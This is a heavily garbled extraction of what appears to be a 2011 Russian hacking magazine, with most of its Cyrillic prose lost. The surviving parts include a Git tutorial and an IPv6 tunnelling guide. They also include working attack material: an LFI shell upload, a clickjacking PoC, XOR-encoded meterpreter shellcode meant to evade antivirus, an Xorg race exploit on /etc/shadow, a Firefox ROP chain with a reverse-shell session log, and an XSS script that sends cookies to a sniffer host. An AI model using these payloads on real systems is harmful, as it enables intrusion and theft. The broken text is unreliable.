$tmp_hex seed .
. . ContentLength ( , ):
$req = substr($req,0,strlen($req)-2);
retname($host,$req);
.
, .
$tmp_hex +1 LFI. ? ,
. , PHP, ,
-
, .
. +2,
+3 . . , , , tmp-,
1 100.

LFI . -:
ttp://site.com/css.php?file=../../../tmp/
php7xEkH3&e=system('dir')

:
php expl.php step4 ../../../tmp/php7xEkH3.tmp
http://site.com/s.txt
here your shell: http://site.com/8149.php
expl.php , .

,
phpinfo() . , PHP Live,
magic_quotes=on ./super . Windows-
, nix*- BWMeter
. , - PHP
-
. , . z
12 /155/ 2011
Preview
32 .
.
PC ZONE
50
IPV6: HOWTO
IPv4 .
.
IPv6! ,
.

IP .
:
, .
.
/ ?

NAT IPv4.
IPv6,
,
.
PC ZONE
46

- , ? clickjacking.
68
:
.
.
102

,
, -
C++11
C++.
12 /155/ 2011
MALWARE
88

,
, , ,
, HIPS.
UNIXOID
106

Google
,

. .
120

kernel.org,linux.com,
linuxfoundation.org mysql.com.
?
041
PC ZONE
Git&GitHub:

5
,
version1, version2, version2a,
.
,
.
, hello
world,
.
15 ,
,
Git!
GIT?
Git ,
, Linux.
: , .
Git'
. : Git ,
.
, , , -
.
, , , ,
, ,
IDE.
. .
Git
, , , .
Linux git
. Mac', ,
git-osx-installer. Windows
,
( ).
Git
Windows, , , .
Git .
GitGUI, Git, IDE git, , ,
.
Git .
commit. . commit , ( ).
:
git config --global user.name "Your Name"
git config --global user.email "your@email.com"
, :
git config --global color.diff auto
git config --global color.status auto
git config --global color.branch auto
042
12 /155/ 2011
Git&GitHub:
commit

git config, ,
.
. .
, ,
(, , ,
).
git init
git, init.
Git- (
.git). , - . . ,
Git Bash (master). ,
. ?
. . () ,
. ( - ), , .
.
git add
commit.
Commit
, . ,
, commit, staging area.
. ,

, .
, staging area:
git add.
. .
:
git add *.js
git add index.php
git commit
commit , , ( ):
git commit
staging area
. commit
12 /155/ 2011
jQuery GitHub
, , ,
, . Git Vim (-,
). , <i> (
), , Initial
Commit. , , <ESC> :wq, . !
Git , commit
. -, -m
commit:
git commit -m "initial commit"
-a staging area
commit .
Git staging area
. -m -a
:
git commit -am 'update to index.php'
git status
git status
. .
commit, git status , .
, , . , ,
git add, - ,
changes to be
committed.
git branch / git checkout
, .
: , ,
. , ,
. Git ,
. branch,
, ,
.
git branch
branch,
. master
branch , .
043
PC ZONE
,
branch, :
git merge experimentalBrunch
git branch experimentalBrunch
experimentalBrunch
.
, Git
( - master-). checkout,
:
git log / gitk

, , , .
log.
git checkout experimentalBrunch
git log
, branch , : git checkout

-b branch name. , branch:
:
, ,
.
(git log graph) GUI-:
gitk --all
git add .
git commit -m 'New architecutre introduced'
,
. .
, , , :
git checkout master
: master- , , ,
.
git merge
. ,

master-.
git merge. , master branch,
:
044
.
, ,
.
GITHUB:
, , Git ,
,
. Git ,
.
,
Git. , ,
GitHub (www.github.com).
, , ,
.
, GitHub, , .
, Git . ,
12 /155/ 2011
Git&GitHub:
, . open source ,
Sign Up . ,
SSH-. ,
-, ( PuTTY)
GitHub-. Public Keys Add another public key.
.
SSH , .
,
, . ,
.
(help.github.com/working-withkey-pass-phrases).
git clone
Git , GitHub
.
, -
, (, ,
- , ). GitHub
. jQuery.
GitHub-, clone URL.
URL , ( Git
) , clone:
git clone git://github.com/jquery/jquery.git
Git jquery
. ,

gitk all.
git push
.
git,
. ! GitHub
(Create Repository), .
,
. GitHub
public clone URL ,
, personal clone URL .
GitHub .
git remote add origin git@github.com:aburgess/My-FirstGitHub-Repo.git
git push origin master
.
origin
private clone URL. git-push master origin (. . GitHub).
,
. GitHub-
.
git pull
push ,
git pull , .
: git fetch ( ) get merge
( ):
git fetch upstream master
git merge upstream/master
12 /155/ 2011

. GitHub Git-.
,
. , ,
,
. . , , ,
,
. GitHub , .
Explore GitHub,
Languages ,
. ,
Watch Fork:
Fork , ;
Watch , ,
, fashboard ( , ).
, . ,
, , .
Follow
, . .
Pull Request
Admin. ,
, (wiki,
download, issues) . .
, ,
. ,
,
Pull request.
FOLLOW GITHUB
GitHub .
-, Git
. .
1,1 , 3 . GitHub,
Git. z
045
PC ZONE
CLICKJACKING: , ,
, :
?,
.
, ,
.

.

,

-.
046
WWW
:
www.sectheory.
com/clickjacking.htm;
www.contextis.
com/resources/
white-papers/clickjacking;
w2spconf.
com/2010/papers/
p27.pdf;
www.owasp.org/
index.php/Clickjacking.
WARNING
.
.
CLICKJACKING?
,
. click jacking ,
- . , , ! ?
HTML-,
:
- <iframe>;
HTML- ,
;
HTML- ,

z-index.
, HTML-
! ,
, iframe,
, .
iframe
- ,
. , , iframe,
CSS- opacity
12 /155/ 2011
""
z-index.
, , , ,
, ,
.
CSS- .
?
clickjacking-.
,

, :
<html> <h1 style="text-align:center"> </h1>
<p style="font-size: 38px;">!
<br> !</p>

<div style="z-index:10; opacity:0; position:absolute;
top:0px; ">
<iframe scrolling="no" style="width:800px; height:500px;"
src="http://www.bing.com/search?q=buy+kindle+amazon">
</iframe>
</div>

<div style="position:absolute; top:200px; left:210px;">
<a href="#"> ?</a>
</div>
</html>
,
Bing.
. ,

.
, , , Retwit Like,
, .
,
.
12 /155/ 2011

, , - ?
, , . ,
, -,
WordPress. ,
. -
WordPress, , .
,
Install Now (, , Firefox).
. http://wordpress/wp-admin/
plugin-install.php?tab=plugin-information&plugin=wp-galleryremote, plugin
. , iframe
Install Now. .
, ,
( ). , ,
( zip-)
URL: http://wordpress/wp-content/plugins/.
. ,
? . . ,
PoC SlidePress,
XSS-.
, .
(
)
(security-assessment.com).
WordPress 3.1.3 2011 .

(- !),
clickjacking. .
047
PC ZONE

?
, -
. ,
. JS-,
.
framebuster framekiller, :
if (top.location != location)
top.location = self.location;
X-FRAME-OPTIONS iframe
.
, ?
,
. ,
. iframe,
(,
).
( , ).
iframe anchor (http://example.com/#section),
.
iframe (
, ),
.
, ( -
, ). ,
.

Flash Player,
. .

-
Flash, , ,
-.
, Flash Player
, SWF- , , URL
www.macromedia.com/support/documentation/en/flashplayer/help/
settings_manager02.html. , ,
(: bit.ly/sDR5Qv). proof-of-concept iframe .
,
- . Adobe
, ( framebusting)
. .
. : , Adobe
iframe ,
SWF-,
Flash Player? , !
048
framebuster- ,
, , - ,
. , ,
,
clickjacking-. (bit.ly/vYFL4x),
framebuster-
.
, , :
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
, JS-
. ?

, X-FRAMEOPTIONS. ,
! 2009 ,
(Internet Explorer, Safari,
Firefox, Chrome). X-FRAME-OPTIONS . DENY
.
SAMEORIGIN
.
( WordPress
). . -,
. -,
, (
X-FRAME-OPTIONS
). , -, ,
.
-

12 /155/ 2011
- . .
function refreshSettings(timeout) {
window.setTimeout(function() {
$('#settings').empty().append($('<iframe
allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.
swf?defaultTab=privacy"></iframe>'));
setSettingsVisibility();
}, timeout);
}
Adobe JavaScript-, iframe.

SWF-
- . ,
, ? :) (www.
feross.org/webcam-spy), PoC,
Mac Firefox Safari, GitHub (github.com/
feross/webcam-spy). ,
z-index opacity SWF-,
iframe. ,
,
Adobe.
. (
), -
Flash Player'
Wired Gizmodo , Flash .
?
, , ,
SQLi , , XSS. (, , ).
,
. , clickjacking
- ( ),
. FireFox NoScript
(addons.mozilla.org/ru/firefox/addon/noscript)
. ClearClick
,
. , . z
- WordPress
12 /155/ 2011
049
PC ZONE

IPV6-
?
, ,
:
IPv4- .
? ? ?
.

,
IPv4-

IPv6. :
.
IPv6

,
.
uTorrent Teredo
050
WWW

IPv6:
ipv6-test.com/
speedtest
,
IPv6:
bit.ly/rHoc4B

SixXS

:
bit.ly/v0tOAC
IPv6:

?
128-
(2001:5c0:1400:a::68d) 32- (65.148.151.124)
IPv6-. : IPv6-
, . ,
,
IPv4-. ,
IPv6, IP-,
NAT . , . .
1. ,
NAT.
NAT, IPv4- .
, () IP-
, () . NAT :
, ,
. ICQ, IP-, .
(
), IPv6 .
, , ,
IPv4 IPv6 (
IPv6 ).
, IPv6. ,
, ,
IPv6-
. IPv6
,
( IPv4-) .
12 /155/ 2011
IPv6:
NAT'. gogoCLIENT NAT Traversal,
IPv6- IPv4-. ,

2. IPv6-.
, -
(, BitTorrent), IPv6
, . ,
. . IP UDP, UDP IPv6, IPv6 TCP- UDP-,
.
, , IPv6- IPv4 (, UDPv4).
, .
IPv6-to-IPv4?
, IPv6
UDPv4-: , ,
.
3. . ,
. , torrent-,
NAT', ,
IP- (
). IPv6-,
. ,
, NAT',
IP- ( IPv6,
). torrent IPv6: uTorrent, Azureus, Transmission.
IPv6 DHT ( ),
, . peers6,
, 18 (16 , 2 ).
12 /155/ 2011
, IPv6- ,
. ,
thepiratebay.org ipv6.nnm-club.ru .
4. .
( , ). ,
,
:).
.
. , IPv6- .

, IPv6?
, , , IPv6- . , -,
, -, (
, ), , -, .
, ,
IPv4. , , IPv6-, ,
, .
. .

, . IPv6-,
. . IPv6
( ),
.
NAT, IPv4-, , ,
.
IPv6. .
051
PC ZONE

Gogonet/Freenet6
gogonet.gogo6.com
,
,
NAT. GUI, /56-
. IPv6, ,
, .
.
Hurricane Electric IPv6
http://www.tunnelbroker.net
, /48- IPv6-.
,
(, , , , , ,
), ,
. ,
,
IP.
SixXS
www.sixxs.net
AYIYA-, , ,
IPv6.
(
) 40
. :
(
LinkedIn), .
10 IPv6 (bit.ly/snYfdm).
6to4
IPv4-, 6to4
IPv6.
, . 6to4- IPv6-, 6to4-,
IPv4-, IPv6-. 6to4 IPv6-, anycast- 192.88.99.1. ,
6to4, IPv6- IPv6-.
, .
6to4- 2002:xxyy:zztt,
xx.yy.zz.tt IPv4-,
, ,
192.88.99.1. . 6to4
, 6to4
, ,
, . - ,

. .
IP-,
IPv6. 6to4 . ,
,
, , 200 .
Teredo
,
IP-, NAT. 6to4 -
052
IPv6-
Teredo. IPv6- IPv4

UDP- , ,
NAT. Microsoft
, Windows, nix-.
uTorrent, Install IPv6/Teredo ( uTorrent
IPv6, ). Teredo
( Vista/Windows 7):
ipv6 install
netsh int ipv6 set teredo client
(, , ) Teredo (, Miredo):
sudo apt-get install miredo
IPV6
1. IPv6 , , 128- . IPv6-
: , 2001:0db8:11a3:09d7:1f34:8a2e:07a0:765d.
0000,
. 2001:0db8:0000:0000:0000:0000:ae21:ad12 2001:db8::ae21:ad12. ,
IPv6-,
: http://[2001:db8::ae21:ad12]. , IPv6-
DNS-.
2. - , , IPv6 ,
IPv4. /prefix'
(CIDR / VLSM). IPv6 /64. . IPv6 /64- , ,
.
/48.
3. NAT'.
, (VoIP), ,
P2p-. .
12 /155/ 2011
IPv6:
IPv6-
: , ,
. ,
, (Teredo NAT). .
Teredo IPv6: ,
, (
,
teredo.remlab.net). .
6to4 IPv6-,
, Teredo
. : Teredo-
UDP-, . .
. , Teredo NAT.
ipv6.google.com, netsh int
ipv6 show teredo. :
NAT , Teredo .
( )
.

, , ,
IPv4-,
. , , IPv6-. (bit.ly/vRZwX8),

. ,
. ping
traceroute, ipv6-test.com. :
IPv6,
. ,
, , IPv6-. ,
IPv4-
.
( , ). ,
, .

IPv6 UDPv4
.
( , ) gogo6/
Freenet6 (gogonet.gogo6.com), .

, ,
, IPv6, ,
12 /155/ 2011
. freenet6, gogo6,
.
: IPv6-in-IPv4 (
, IP), IPv6-in-IPv4 NAT
Traversal ( IPv6-in-UDP-is-IPv4),
, IP, IPv4-in-IPv6 ( ,
IPv4-, IPv6-).
TSP (Tunnel
Setup Protocol). , .
:
1. gogoCLIENT (gogonet.gogo6.com/
profile/gogoCLIENT).
2. ,
Connect.
,
,
- IPv6- (, ipv6.google.com).
.
3653.
. ,
IPv4- IPv6.
IPv6-, :
1. (gogonet.gogo6.com/page/freenet6registration), freenet6 .
2. Connect Anonymously Connect Using the
Following Credentials, .
3. Connect.
IPv6-,
test-ipv6.com. .
freenet6 - (username.broker.freenet6.net).
,
plain-text'. ,
Advanced PASS DSS
3DES1 Digest MD5.
IPV6
freenet6 , IPv6-,
. ,
,
, (,
). ,
- .
, 10 ,
. z
053
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK
SMS
! , IDS, DMZ,
PDF - ,
. ,
, SMS-, . ,
SMS. ,
, . (
).
, . :) Smsglobal
(www.smsglobal.com). ,
25 SMS- .
, ( Preferences Sender ID)

. ! ,
. ,
,
SMS 1 . ,
,
SMS. , - e-mail,
- SMS. , ,
,
- .

WINDOWS
, Windows 7/2008, ,
, ,
, .
1. .
2. :
.{ED7BA470-8E54-465E-825C-99712043E01C}
- , ,
. ,
EasyHack. :)
054
12 /155/ 2011
EASY HACK
,
. , !
. ,
, .
, -.
,
. ! ,

-. ,
. XXI
! -, . :)
Python- Findmyhash
(code.google.com/p/findmyhash). ,
-.
, .
:
python findmyhash_v1.1.2.py MD5 -g \
-h a25b2710ba9de114396adc7dfb0a7235
python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt
:
-h ;
-f ;
-g Google.
,
.
MD5- NTLM-
RDP
, , , ,
,
,
. ,
,
, . , , ,
.
. RDP Windows
.
RDP ,
6- (
Vista Ser ver 2008).

,
rdp-.
. , ?

Default.rdp, (,
RDP 6). , password
51:b: .
,
CryptUnprotectData() crypt32.dll.
, ( ).
,
, , SID
, .
12 /155/ 2011
- Cain&Abel
(www.oxid.it).
Remote Desktop Password Decoder
rdp-. C&A
.
, MSF
.
rdp .
MSF, :
1. meterpreter .
2. post-:
run post/windows/gather/enum_rdp_pwd
rdp-
055
/ EASY HACK
SSLV3-
HTTPS. manin-the-middle SSL-,

SSLv3/TLS. -, BEAST
.
: , , arp-spoofing.
SSL
(
arp-spoofing ).
. ? SSL. 2009
TLS/SSLv3 renegotiation vuln (CVE-2009-3555).
, ( ,
). , 10 %
(
: www.ssllabs.com/ssldb/analyze.html).
. , ,

, .
, :
1) TLS handshake
( 1).
1.1 TLS ( 2).
1.2
2.
2) (
renegotiation).
3) 1, ,
2 ( Session ID,
, 1 2).
056
.
4) ,
1.2, , 3.
,
, . ,
, ( 1.1
1.2). (renegotiation)
( 2) ( 3).

.
(
:)) ?
TLS (Session ID).
, . ,

TCP. . ( 1)
( 1.1). ,
( 3),
.
?
, ,
( , ). (www.g-sec.lu/practicaltls.pdf).
. -,
SSLv3/TLS, HTTPS,
FTPS, SMTPS, POP3S . . , . ?
. ,
- .
, ,
12 /155/ 2011
EASY HACK
. ,
. , HTTP
:
1. URL. , CSRF,
GET-. header
injection.
1) 1.2
GET /path/to/resource.jsp HTTP/1.0
Ignor-me:
2) , ,
:
GET /path/to/resource.jsp HTTP/1.0
Ignore-me: GET /index.jsp HTTP/1.0
Cookie: sessionCookie=Token
2. Redirect c HTTPS HTTP. sslstrip.

HTTP HTTPS. , ,
. , sslstrip . SSL
renegotiation :
,
HTTP ( 1.2):
GET /url_that_will_302_to_HTTP
Ignore-what-comes-now:
3. XSS . web-
TRACE, JavaScript-.
1.2 :
TRACE / HTTP/1.0
X:This content will be reflected in the response to the cl
ient<html><script>alert('XSS')</script></html>
X-ignore:
. PoC. Python,
. :) ,
, - (www.ssllabs.com/ssldb/analyze.
html), ssltest, BackTrack 5,
ssltlstest .
100 %- ,
XOR METERPRETER
meterpreter Metasploit (www.metasploit.

com) . , ,
meterpreter .
, -
exe- ( ),
-
. meterpreter,
- exe-.
.
.
, . MSF c
msfpayload exe- ,
. :
XOR rocks! Avast
12 /155/ 2011
#msfpayload windows/meterpreter/bind_tcp R | msfencode \

-c 5 x86/shikata_ga_nai -t c -o test_3.c
:
windows/meterpreter/bind_tcp MSF;
R ;
msfencode ;
-c 5 x86/shikata_ga_nai payload ;
-t c : C;
-o test_3.c .
msfencode,
, . msfpayload c C R, stage ,
(meterpreter -).
, ,
. , MSF payload
,
. msfpayload
- ( ).
- -, ,
. ! main - MSF,

. :
int main (int argc, char **argv)
{
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
057
/ EASY HACK
meterpreter
. (GCC, VC).
Dev-Cpp.
.
, , meterpreter (,
icmp/udp-, TCP ,
meterpreter).
, XOR . :) XOR -:
unsigned char buf[] = ".shellcode_here";
int main(int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
printf("\\x%02x",buf[i]);
}
}
( EasyHack - ? :)). buf

XOR. . ,
- MSF, XOR.
-, , .
. :
058
1.
2.
3.
4.
- .
- , XOR.
main XOR.
main :
int main (int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
}
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
5. .
, , XOR
, (A ^ B ^ B = A).
Avast .
? , .
- ,
( XOR)
.

y0nd13 aka D1g1
. :)
12 /155/ 2011
WEXLER.HOME 903

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .

. , , ,
.
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
(ivinside.blogspot.com)
(115612, . , .1)
,
! , ,
,
. , !

Apache mod_proxy
CVSSV2
5.0
(AV:N/AC:L/AU:N/C:P/I:N/A:N)
BRIEF
: 11 2011 .
: Rodrigo Marcos.
CVE: CVE-2011-3368.
(, Nginx Squid), Apache ,
mod_proxy.
-
(, ),
, .
, mod_proxy,
.
EXPLOIT
RewriteRule
ProxyPassMatch -,
, -. Apache
. .
, -
:
RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2
,
. :
GET @other.example.com/something.png HTTP/1.1
400 Bad Request.

SECFORCE PoC . : goo.gl/Ob6yV.
mod_proxy ,
(DMZ).
,
Apache ( Apache, ,
).
, :
python apache_scan.py [options]
[options]
-r: Apache
-p: , Apache ( 80)
-u: URL ( /)
-d: (DMZ) (
127.0.0.1)
-e: DMZ ( single port scan)
-g: GET- DMZ ( /)
-h:
:

python apache_scan.py -r www.example.com -u /img/test.gif
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local -e 80 -g /accounts/index.html
TARGETS
Apache HTTP Server 1.3.x 1.3.42;

Apache HTTP Server 2.0.x 2.0.64;
Apache HTTP Server 2.2.x 2.2.21.
-, , :
SOLUTION
http://images.example.com@other.example.com/something.png
, other.example.com,
images.example.com@ .
URI (@other.example.com/something.png HTTP/1.1)
HTTP,
060
mod_proxy
(goo.gl/xNIqR). ,
RewriteRule :
RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]
12 /155/ 2011

Xorg
CVSSV2
5.7
(AV:L/AC:L/AU:S/C:C/I:P/A:P)
BRIEF
: 28 2011 .
: vladz.
CVE: CVE-2011-4029.
vladz Xorg, /tmp/.tXn-lock (n
X). .
, X- .
EXPLOIT
Xorg /tmp/.Xn-lock. : ()
/tmp/.tXn-lock O_EXCL PID, /tmp/.Xn-lock, .
/tmp/.Xn-lock. , , .
, chmod() , , /tmp/.tXn-lock
, open().
, /tmp/.tXn-lock
open() ( 296) chmod() ( 318).
, , ... Xorg
( ),
( 341) ,
chmod()?
:
# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, "
2192\n", 11)
= 11
chmod("/tmp/.tX1-lock", 0444)
= 0
1. X- (PID n).
2. , SIGSTOP /tmp/.tX1-lock. ,
chmod().
3.
/tmp/.tX1-lock.
4. /tmp/.tX1-lock -> /etc/shadow.
5. SIGCONT, chmod() 444 /etc/shadow.
, ,
X-, ,
. : /tmp/.X1-lock -> /dontexist.
X- FatalError().
exploit-db.com, ID 18040.
:
cc xchmod.c -o xchmod
./xchmod [///] ( - /etc/shadow)

$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
$ ./xchmod
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 4134 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg
process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 4134 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
TARGETS
Xorg 1.4 1.11.2.

Xorg 1.3 USE_CHMOD.
SOLUTION
Xorg 1.11.2 1.12 .

, SIGSTOP
SIGCONT, . ,
. , :

Array.reduceRight - Mozilla
Firefox
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 13 2011 .
: Chris Rohlf, Yan Ivnitskiy, Matteo Memelli, dookie2000ca,
sinn3r, mr_me, TecR0c.
CVE: CVE-2011-2371.
Metasploit,
Mozilla Firefox 3.6. ,
reduceRight()
.
EXPLOIT
ACDSee FotoSlate 4.0. Access Violation.

SEH-
12 /155/ 2011
reduceRight callback
:
( callback-),
, , -
061
/
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f, 1, 2, 3);
</script>
</body>
</html>
spray() heap spraying ASLR. DEP ROP-:
Firefox 3.6.16. (generic/debug_trap)
. Callback- ( ), .
reduceRight JS-
array_extra jsarray.cpp. 2740
Array.Length :
jsuint length;
if (!js_GetLengthProperty(cx, obj, &length))
return JS_FALSE;
jsarray.cpp 2767. JavaScript- reduceRight,

start, end step .
jsint ( ).
jsint start = 0, end = length, step = 1;
switch (mode) {
case REDUCE_RIGHT:
start = length - 1, end = -1, step = -1;
start = length 1,
start , length . JS, , :
<html>
<head>
</head>
<body>
<object id="d"><object>
<script>
var myobject = document.getElementById('d');
function spray() {
//...
}
spray();
obj = new Array;
062
101F1806
101F180
POP EAX
RETN
; <&KERNEL32.VirtualAlloc>
103E0D7B
103E0D7D
MOV ESI,DWORD PTR DS:[EAX]

; kernel32.VirtualAlloc
RETN
102D8002
102D8003
POP EBP ; xul.1003876B

RETN
10040001
10040002
POP EBX
RETN
104E6917
104E6918
POP EDX
RETN
102AC000
102AC001
POP ECX ; xul.104C26F0

RETN
102E0005
102E0006
POP EDI ; xul.102AC001

RETN
101F1806
101F1807
POP EAX ; <&KERNEL32.VirtualAlloc>

RETN
102B3401
102B3402
PUSHAD
RETN
102AC001
RETN
7C809AE1 >
7C809AE3
7C809AE4
7C809AE6
7C809AE9
7C809AEC
7C809AEF
7C809AF2
7C809AF4
7C809AF9
7C809AFA
MOV EDI,EDI ; xul.102AC001

PUSH EBP
MOV EBP,ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+C]
PUSH -1
CALL kernel32.VirtualAllocEx
; //
;
POP EBP
RETN 10
1003876B
JMP ESP ; payload
Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright
msf exploit(mozilla_reduceright) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_reduceright) > set lhost 192.168.0.121
lhost => 192.168.0.121
msf exploit(mozilla_reduceright) > set uripath test
12 /155/ 2011
. 12
, ,
Metasploit, . ,
ACDSee FotoSlate 4.0 ( 146) id String,
. PLP-
ACDSee FotoSlate .
SEH- . pop-pop-ret,
, .
0x263a5b57 ipwssl6.dll.
:
msf > use exploit/windows/fileformat/acdsee_fotoslate_string
msf exploit(acdsee_fotoslate_string) > set payload
windows/exec
payload => windows/exec
msf exploit(acdsee_fotoslate_string) > set cmd calc.exe
cmd => calc.exe
msf exploit(acdsee_fotoslate_string) > exploit
[*] Creating 'msf.plp' file ...
[*] Generated output file
/home/pikofarad/.msf4/data/exploits/msf.plp
mod_proxy
uripath => test

msf exploit(mozilla_reduceright) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.121:4444
,
( ).
TARGETS
[*] Using URL: http://0.0.0.0:8080/test

[*] Local IP: http://192.168.0.121:8080/test
[*] Server started.
msf exploit(mozilla_reduceright) >
[*] Sending exploit to 192.168.0.123:1074...
[*] Sending stage (752128 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.121:4444 ->
192.168.0.123:1075) at 2011-10-17 18:32:40 +0400
[*] Session ID 1 (192.168.0.121:4444 ->
192.168.0.123:1075) processing InitialAutoRunScript
'migrate -f'
[*] Current server process: firefox.exe (1992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1652
[+] Successfully migrated to process
ACDSee FotoSlate 4.0 Build 146.

SOLUTION
,
. z
TARGETS
Mozilla Firefox 3.6.16, 3.6.17.

SOLUTION
, .
ACDSee FotoSlate
id,
PLP-
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 10 2011 .
: Parvez Anwar, juan vazquez.
CVE: CVE-2011-2595.
ACD FotoSlate
, ,
4x6 5x7. ,
12 /155/ 2011
Xorg
063
(ICQ: 555-856-204)
DEMOTIVATORS.RU
XSS
- ,
, ()
.
, , XSS demotivators.ru.
WWW
demotivators.ru
;
www.djangoproject.com
Django-.
064
12 /155/ 2011

, .
:
, ,
, .
<b>. -
: <b> !</b>. , ,
?
, <script> <body>.
. XSS-, :
<sCr<bOdY>iPt>
,
, . , - ,
, .
<b lol="yeah"> </b>
. ,
<b>.
, , , :
<script>, <img>, <body>, <frameset>, <input>, <span>...
, -
PHP- strip_tags(),
. , . , <img> :
: <img src="http://1.com/1.jpg">
: < ="http://1.com/1.jpg">
, strip_tags(),
- . , . , -
XSS
12 /155/ 2011
065
JS-
XSS-
. : ( ),
, . .
, , , ? 2030
JS- , .
JS -:

,
,
XSS:
var servers = [
'http://free1.host1.com/',
...
'http://free3.host5.com/'
];
for (var key in servers)
{
document.getElementById('footer').innerHTML +=
'<script src="'+servers[key]+'"></script>';
if (loaded){break;}
}
if (loaded){...}
loaded, , .
,
, . ,
.
.
,
PHP ,
. ,
logs.txt, .
$_SERVER['HTTP_USER_AGENT'] ;
$_SERVER['REMOTE_ADDR'] IP-;
$_SERVER['HTTP_REFERER'] ( );
date("d.m.y H:i") ;
urldecode($_GET['c'])
;
$_SERVER['QUERY_STRING']
.
, strip_tags(). ,
Django, .
, ,
XSS-. , , , , .

, ,
- ,

.
, ,
HTML-. HTML,
- -
. , , XSS. - <!DOCTYPE>,
.
XSS ,
- .
.
:
<!><html><head></head><body></body></html>
066
, -
, ,
, , . <!DOCTYPE>!,
-
demotivators.ru HTML- (<html>
<body>). ,
, ,
, - . :-)
12 /155/ 2011
XSS DEMOTIVATORS.RU
XSS ,

.
:
1. - XSS
, vkontakte.ru, mail.ru,
yandex.ru . .
XSS ,
. , demotivators.ru .
, XSS
:
2. . :
, , ,
, JavaScript-,
XSS div-,
,
. ,
:
<script src="http://partner.ru/
js.php?id=123"></script>

:
// ""
function n(){return new Image();}
var xss_1=n(), xss_2=n(), xss_3=n(),
sniff = 'var x = new Image(); x.src
= "http://tvoi.sniffer.com/?c="+
escape(document.cookie);';
// XSS
""
xss_1.src = 'http://site1.ru/search.
php?q="><script>'+sniff+'</script>';
window.onload=function()
{
document.getElementById('banners').
innerHTML = '<script src="http://
partner.ru/js.php?id=123"></script>';
}
3. .
JS + PHP,
. : JS-,
, JS-
, . ,
- .
XSS-, , . , <!DOCTYPE> -
, ,
,
. ,
. <FRAMESET>.
:
<!DOCTYPE><FRAMESET onLoad="{xss}"></FRAMESET>
,
, .
:
<!DOCTYPE><FRAMESET onLoad="{xss}"
style="display:none;"></FRAMESET>
12 /155/ 2011
,
action
.
(, )

action-.
(, ).
4. pop-under
pop-up.
<script>, .
5.
iframe. , .
6. - JavaScript:
document.getElementById('id_dema').
src = 'http://host.ru/podmena.jpg';
7. : iframe

(
).
8.
JS-.
{xss} javascript- .
, . .
, ,
. ,
AJAX. , ,
-
HTML + JS. ,
.
.
THE END
.
, (
).
, XSS - .
, , ,
demotivators.ru.
.
:
500 .
12 (180
), .
,
. ! z
067
DBMX
,
, ,
!

,
.
WWW
www.master-x.com

.
www.gofuckbiz.com

-.
www.rxpblog.com

-.
( ) , .
, .
. ,
. ,
. - ,
.
,
, , . ,
, ,
.
-

, , .

.
068
OEM

, .
,
,
.
()

. , ,

,
-
,
.
CPA ( )
, -

,
, ,

.
12 /155/ 2011
:
:
:

(generics,
,
) .
,
,
,
, ,
.
- ,
,
3050% .

,
-
. -, ,
.
(, , )
.
.
,

.
.

(
).
.
,
.
-

,

, :).
, .
, .
-
.
,
, ,
.
, ,
.
-
.
.

Pharmcash.com
RX-Partners.biz
Stimul-Cash.com
OXOnetwork.com
2010
2006
2006
2007
/ -:
40% ,

100 45%,
300 50%
3050% (

)
75%

70%

, ,
, ,
, ,
, ,
, ,
, ,
., ., ., ., .,
., ., ., .
Visa, MasterCard,
ACH, Wire
Visa, MasterCard, ACH,

Wire, MoneyGram
Visa, MasterCard, ACH,

Wire, MoneyGram
Visa, EuroDebit, ACH, Wire
$100
$100
$50
$100
,
(
)

(10 ),
12 /155/ 2011
069
:
:
:

. .

. , , xhamster.com
,
.
, .
, ?
, -
.
, ,
.
$30.
-
4060%. , .
, .

(),
.

,

.
,
.
( ),

.
,
().

WordPress .
.
FGH ( ,
). ,
